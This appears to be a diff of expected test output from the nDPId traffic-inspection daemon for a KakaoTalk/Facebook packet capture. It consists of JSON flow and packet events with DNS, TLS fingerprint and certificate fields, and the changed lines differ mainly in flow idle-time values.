+00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030508,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030508,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1430069030508,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030508,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADz6+UAAPwaAjQoYUrwfDURUkrEAUI6+8f0AAAAAoAI5CDAyAAACBAV4BAIICgALCwQAAAAAAQMDBw=="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1430069030549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1430069030549,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACy6BkAA+AYIkB8NRFQKGFK8AFCSsWQ58S+OvvH+YBIRHF3ZAAACBAV4"} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1430069030552,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030552,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACj6+kAAPwaAoAoYUrwfDURUkrEAUI6+8f5kOfEwUBA5CE1uAAA="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030557,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069030557,"l3_proto":"ip4","src_ip":"31.13.68.73","dst_ip":"10.24.82.188","src_port":443,"dst_port":47007,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAEMbkEAAjgYQ+x8NREkKGFK8Abu3n2dAc1oKhoE3UBigBOCLAAAVAwEAFgdiLTjhEFi+7He1g59CCs5hRzaz7rI="} 
+00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACgOyEAAQAZr3goYUrwfDURJt58BuwqGgTdnQHN1UBBuKMBEAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1430069030557,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069030557,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACgbkUAAjgYRFR8NREkKGFK8Abu3n2dAc3UKhoE3UBGgBC\/XAAA="} +00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030508,"flow_last_seen":1430069030600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1430069030600,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":37553,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {"hostname":"www.facebook.com","url":"www.facebook.com\/mobile\/status.php","code":0,"content_type":"","user_agent":"Dalvik\/1.6.0 (Linux; U; Android 4.4.4; MI 3W MIUI\/V6.4.3.0.KXDMICB)"}} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1430069030703,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":78,"pkt_l4_len":42,"thread_ts_msec":1430069030703,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAD4AAEAAQBHSHgoYUrwKvAEBYBQANQAqICQnwAEAAAEAAAAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQAB"} 00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030703,"flow_last_seen":1430069030703,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1430069030703,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} -01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":91,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069026370,"flow_last_seen":1430069030731,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":1648,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":1430069030731,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA"}} +01799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":95,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1430069026370,"flow_last_seen":1430069030740,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":3915,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1430069030740,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.97.2","src_port":35503,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"dff8a0aa1c904aaea76c5bf624e88333","ja3s":"6c13ac74a6f75099ef2480748e5d94d2","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_RC4_128_SHA","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., 
CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} 00546{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1430069030748,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":118,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":118,"pkt_l4_len":82,"thread_ts_msec":1430069030748,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAGbtpgAANREvUAq8AQEKGFK8ADVgFABSeRsnwIGAAAEAAgAAAAADYXBpCGZhY2Vib29rA2NvbQAAAQABwAwABQABAAAD6wAMBHN0YXIEYzEwcsAQwC4AAQABAAAACQAEHw1EVA=="} 00794{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1430069030703,"flow_last_seen":1430069030748,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":74,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1430069030748,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":24596,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"api.facebook.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"31.13.68.84"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} -00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} 
-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030751,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069030751,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1430069030751,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030751,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADwzN0AAPwZIUAoYUrwfDURUsJkBu9qbOCoAAAAAoAI5CH68AAACBAV4BAIICgALCx0AAAAAAQMDBw=="} +00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1430069030835,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069030835,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAAjgYshx8NRFQKGFK8AbuwmcDC6aramzgroBKpsCsUAAACBAV4BAIICqKRlfAACwsdAQMDBg=="} 
+00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1430069030839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069030839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADQzOEAAPwZIVwoYUrwfDURUsJkBu9qbOCvAwumrgBAAcwLZAAABAQgKAAsLJaKRlfA="} +00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069030751,"flow_last_seen":1430069030840,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":563,"flow_tot_l4_payload_len":563,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1430069030840,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3} 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1430069030978,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":80,"pkt_l4_len":44,"thread_ts_msec":1430069030978,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAEAAAEAAQBHSHAoYUrwKvAEBTH4ANQAsPIiqhwEAAAEAAAAAAAAFZ3JhcGgIZmFjZWJvb2sDY29tAAABAAE="} 00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069030978,"flow_last_seen":1430069030978,"flow_idle_time":180000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1430069030978,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"10.188.1.1","src_port":19582,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Facebook","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"graph.facebook.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}} -01822{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":115,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1430069030751,"flow_last_seen":1430069031013,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1430069031013,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api.facebook.com","server_names":"*.facebook.com,facebook.com,*.fbsbx.com,*.fbcdn.net,*.xx.fbcdn.net,*.xy.fbcdn.net,fb.com,*.fb.com,*.facebookcorewwwi.onion,facebookcorewwwi.onion,*.fbcdn23dssr3jqnq.onion,fbcdn23dssr3jqnq.onion,*.fbsbx2q4mvcl63pw.onion,fbsbx2q4mvcl63pw.onion,*.m.facebook.com,*.messenger.com,messenger.com,*.m.facebookcorewwwi.onion,*.xx.fbcdn23dssr3jqnq.onion,xx.fbcdn23dssr3jqnq.onion,*.xy.fbcdn23dssr3jqnq.onion,xy.fbcdn23dssr3jqnq.onion,*.xz.fbcdn.net,xz.fbcdn.net,*.xz.fbcdn23dssr3jqnq.onion,xz.fbcdn23dssr3jqnq.onion,m.facebookcorewwwi.onion","ja3":"051d20e8adbe8dac78945de300764d5e","ja3s":"6806b8fe92d7d465715d771eb102ff04","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.facebook.com","fingerprint":"A4:FB:65:F8:A1:57:FE:0D:C0:17:C1:B5:51:62:63:3A:18:73:A0:B4"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":111,"source":"KakaoTalk_chat.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069030751,"flow_last_seen":1430069031001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1951,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1430069031001,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"31.13.68.84","src_port":45209,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 
